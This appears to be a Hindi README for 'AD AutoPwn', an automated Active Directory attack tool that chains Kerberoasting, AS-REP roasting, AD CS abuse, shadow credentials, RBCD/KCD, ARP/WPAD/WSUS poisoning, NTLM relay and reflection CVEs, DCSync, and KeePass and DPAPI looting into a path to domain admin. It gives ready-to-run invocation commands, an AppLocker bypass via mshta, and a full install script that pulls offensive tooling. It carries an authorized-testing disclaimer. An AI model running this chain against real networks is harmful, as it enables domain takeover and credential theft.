
AD AutoPwn v4.10.0 — स्वचालित AD हमला श्रृंखला, शून्य-प्रमाणीकरण से डोमेन एडमिन तक। Discover/Kerberoast/AS-REP/AD CS ESC1-16/Shadow Creds/RBCD+KCD/Ghost-SPN/TGS-rewrite/Dollar-Ticket/WPAD/WSUS/PXE/SCCM/BloodHound auto-action/Loot/DCSync/DPAPI + Synacktiv 2026 reflection (CVE-2025-58726/2026-24294/2026-26128). केवल अधिकृत पेंटेस्टिंग।
शून्य-प्रमाणीकरण से डोमेन व्यवस्थापक तक — स्वचालित सक्रिय निर्देशिका आक्रमण श्रृंखला
एक पूरी तरह से स्वचालित पैठ परीक्षण उपकरण जो सक्रिय निर्देशिका वातावरण से समझौता करने के लिए 25+ आक्रमण तकनीकों को जोड़ता है। अधिकृत सुरक्षा मूल्यांकनों के लिए डिज़ाइन किया गया।
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ शून्य-प्रमाणीकरण से डोमेन व्यवस्थापक — आक्रमण श्रृंखला
खोजें | सूँघें | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roast
BloodHound | Reflect | Loot | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH है)--spray-password के माध्यम से).library-ms / .theme / .url फ़ाइलें लिखने योग्य शेयरों परbloodhound-python -c All संग्रह + ZIP विश्लेषणWriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → घोस्ट-SPN अपग्रेड (CVE-2025-58726)AddKeyCredentialLink → शैडो क्रेडेंशियल → PKINIT → NT हैशकंप्यूटर पर GenericAll / WriteAccountRestrictions → RBCD चेन → एडमिन TGS-altservice पुनर्लेखन, एक चरण में-altservice के माध्यम से$-प्रत्यय पुनर्प्रयास → लिनक्स उपयोगकर्ता के लिए स्वचालित रूप से बनाए गए <user>$ मशीन खाते के माध्यम से TGT → GSSAPI SSHGet-CimInstance Win32_Process nxc -x के माध्यम से; mysql/sqlcmd/runas/KeePass/--password शैली फ्लैग में पासवर्ड के लिए रेगेक्स-ग्रेपC:\Users में *.kdbx ढूँढें, smbclient के माध्यम से डाउनलोड करें, keepass2john | hashcat -m 13400# पूरी तरह से स्वचालित — शून्य-क्रेड चेन (सब कुछ स्वचालित रूप से खोजता है)
sudo ./ad-autopwn.py
# क्रेडेंशियल के साथ — पूर्ण चेन
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# AWS / VPC लैब (लेयर 2 हमले अवरुद्ध) — ऑटो-डिस्कवरी अभी भी काम करती है
sudo ./ad-autopwn.py --no-arp --no-wpad
# प्री-ऑथ क्रेडेंशियल खोज (लॉकआउट-सुरक्षित)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# BloodHound ग्राफ संग्रह + स्वचालित उच्च-मूल्य विश्लेषण
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# डॉलर टिकट — स्वचालित रूप से बनाए गए root$ मशीन खाते के माध्यम से 'root' के लिए TGT
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# RBCD+KCD चेन — पूर्ण घोस्ट-SPN + RBCD + altservice पुनर्लेखन, एक शॉट
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# AppLocker बायपास
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# ड्राई रन (प्रत्येक कमांड प्रिंट करें, कुछ न चलाएँ — यहाँ तक कि पृष्ठभूमि प्रक्रियाएँ भी)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1
apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
/opt/tools/ में क्लोन करें)git clone https://github.com/mverschu/CVE-2025-33073 /opt/tools/CVE-2025-33073
git clone https://github.com/dirkjanm/krbrelayx /opt/tools/krbrelayx
git clone https://github.com/Wh04m1001/DFSCoerce /opt/tools/DFSCoerce
git clone https://github.com/ShutdownRepo/ShadowCoerce /opt/tools/ShadowCoerce
git clone https://github.com/ShutdownRepo/pywhisker /opt/tools/pywhisker
git clone https://github.com/dirkjanm/PKINITtools /opt/tools/PKINITtools
git clone https://github.com/csandker/pxethiefy /opt/tools/pxethiefy
git clone https://github.com/garrettfoster13/sccmhunter /opt/tools/sccmhunter
git clone https://github.com/dirkjanm/mitm6 /opt/tools/mitm6
git clone https://github.com/Hackndo/pyGPOAbuse /opt/tools/pyGPOAbuse
git clone https://github.com/Hackndo/WebclientServiceScanner /opt/tools/WebclientServiceScanner
git clone https://github.com/almandin/Certihound /opt/tools/Certihound
pipx install coercer
pipx install wsuks --system-site-packages
kerbrute — नवीनतम बाइनरी प्राप्त करें
https://github.com/ropnop/kerbrute/releases से — /usr/local/bin/ में इंस्टॉल करेंuserenum-cldap — साथी CLDAP NetLogon-पिंग गणक (इस रिपॉजिटरी में userenum-cldap.py के रूप में रहता है; /usr/local/bin/userenum-cldap में इंस्टॉल करें)asn1tools — pip install asn1tools (CLDAP एनम रनटाइम निर्भरता)# APT पैकेज
sudo apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
# सभी आवश्यक रिपॉजिटरी
for repo in mverschu/CVE-2025-33073 dirkjanm/krbrelayx \
Wh04m1001/DFSCoerce ShutdownRepo/ShadowCoerce \
ShutdownRepo/pywhisker dirkjanm/PKINITtools \
csandker/pxethiefy garrettfoster13/sccmhunter \
dirkjanm/mitm6 Hackndo/pyGPOAbuse \
Hackndo/WebclientServiceScanner almandin/Certihound; do
sudo git clone "https://github.com/$repo" "/opt/tools/$(basename $repo)"
done
# जिन रिपॉजिटरी को उनकी आवश्यकता है, उनके लिए Python निर्भरताएँ
for repo in pywhisker PKINITtools sccmhunter pxethiefy mitm6 pyGPOAbuse Certihound; do
[ -f "/opt/tools/$repo/requirements.txt" ] && \
pip3 install --break-system-packages -r "/opt/tools/$repo/requirements.txt"
done
# Pipx पैकेज
pipx install coercer
pipx install wsuks --system-site-packages
# kerbrute (ropnop) बाइनरी
sudo wget -q -O /usr/local/bin/kerbrute \
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
sudo chmod +x /usr/local/bin/kerbrute
# CLDAP userenum रनटाइम निर्भरता
sudo pip3 install --break-system-packages asn1tools
# userenum-cldap साथी स्क्रिप्ट (यह रिपॉजिटरी)
sudo wget -q -O /usr/local/bin/userenum-cldap \
https://raw.githubusercontent.com/jonaslejon/ad-autopwn/main/userenum-cldap.py
sudo chmod +x /usr/local/bin/userenum-cldap
# ad-autopwn स्वयं
sudo cp ad-autopwn.py /usr/local/bin/ad-autopwn
sudo chmod +x /usr/local/bin/ad-autopwn
check_prerequisites() प्रत्येक आह्वान के शीर्ष पर चलता है और उस स्क्रिप्ट द्वारा छूए गए प्रत्येक टूल के लिए हरे ✅ / पीले ⚠️ स्थिति को प्रिंट करता है, जिसमें किसी भी गुम चीज़ के लिए इंस्टॉल संकेत शामिल हैं।
eu-west-1 पर — पूर्ण v4.10.0 चरण कवरेज एंड-टू-एंड सत्यापित।
AWS पर ऑटो-डिस्कवरी अब केवल --no-arp --no-wpad के साथ काम करती है (बाकी सब कुछ — इंटरफ़ेस, हमलावर IP, डोमेन, DC IP, DC FQDN — सबनेट स्वीप + @<dc_ip> पर dig फ़ॉलबैक के माध्यम से स्वचालित रूप से पता लगाया जाता है)।stannis.baratheon → GenericAll → KINGSLANDING$ एज के विरुद्ध सिद्ध: एकल निम्न-विशेषाधिकार क्रेडेंशियल से DC पर 5 सेकंड में एडमिन TGS तक।krbtgt सहित 20 क्रेडेंशियल निकाले — गोल्डन टिकट व्यवहार्य।--dry-run प्रत्येक कमांड (अग्रभूमि और पृष्ठभूमि) बिना निष्पादित किए प्रिंट करता है — ARP स्पूफर, mitm6, Responder, या ntlmrelayx नहीं चलाएगा।try/finally में os.chdir के साथ लिपटे हुए हैं ताकि किसी भी निकास पथ पर पुनर्स्थापना सही निर्देशिका में उतरे।--no-cleanup फोरेंसिक समीक्षा के लिए सब कुछ रखता है।केवल अधिकृत पैठ परीक्षण और सुरक्षा अनुसंधान के लिए।
यह उपकरण अधिकृत जुड़ाव के दौरान सुरक्षा पेशेवरों द्वारा उपयोग के लिए डिज़ाइन किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। परीक्षण से पहले हमेशा लिखित अनुमति प्राप्त करें।
Triop AB — https://triop.se
MIT
| चरण | प्रमाणीकरण | विवरण |
|---|
full | वैकल्पिक | पूर्ण स्वचालित श्रृंखला (क्रेडेंशियल के साथ या बिना स्वचालित रूप से पता लगाती है) |
sniff | कोई नहीं | निष्क्रिय L2 ट्रैफ़िक खोज |
discover | कोई नहीं | kerbrute + CLDAP + AS-REP + pre2k + (वैकल्पिक) स्प्रे |
arp | कोई नहीं | ARP स्पूफ + NTLM कैप्चर |
wpad | कोई नहीं | WPAD/LLMNR विषाक्तीकरण (mitm6 / Responder) |
wsus | कोई नहीं | WSUS NTLM रिले |
pxe | कोई नहीं | PXE बूट क्रेडेंशियल चोरी |
enum | हाँ | लक्ष्य गणना (रिले लक्ष्य, अनियंत्रित प्रतिनिधिमंडल, WebClient होस्ट) |
enrich | हाँ | nxc 13-मोड्यूल बैटरी (LAPS, timeroast, MAQ, nopac, zerologon, …) + ऑटो-उपभोक्ता |
bloodhound | हाँ | bloodhound-python -c All + विश्लेषण + ऑटो-एक्शन चेन |
roast | हाँ | Kerberoast + AS-REP Roast |
adcs | हाँ | AD CS शोषण (ESC1-ESC16) |
sccm | हाँ | SCCM NAA क्रेडेंशियल चोरी |
exploit | हाँ | विशिष्ट लक्ष्य पर NTLM प्रतिबिंब / बाध्यता शोषण |
dcsync | हाँ (DA) | डोमेन हैश डंप |
loot | हाँ | प्रक्रिया cmdline हार्वेस्ट + KeePass खोज/क्रैक |
tgs-rewrite | कोई नहीं | ऑफ़लाइन ccache sname पुनर्लेखन (tgssub-शैली KCD बायपास) |
dollar-ticket | हाँ | KDC $-प्रत्यय पुनर्प्रयास हमला (लिनक्स GSSAPI लक्ष्य) |
rbcd-kcd | हाँ | पूर्ण RBCD+KCD चेन ऑर्केस्ट्रेटर (WriteSPN → घोस्ट → RBCD → S4U+altservice) |
reflect-tcpport | हाँ | CVE-2026-24294 LPE प्रिमिटिव (SMB-ऑन-टीसीपीपोर्ट) |
reflect-loopback | हाँ | CVE-2026-26128 LPE प्रिमिटिव (यूनिकोड SPN के माध्यम से Kerberos लूपबैक) |
kerb-reflect | हाँ | CVE-2025-58726 घोस्ट-SPN AP-REQ प्रतिबिंब |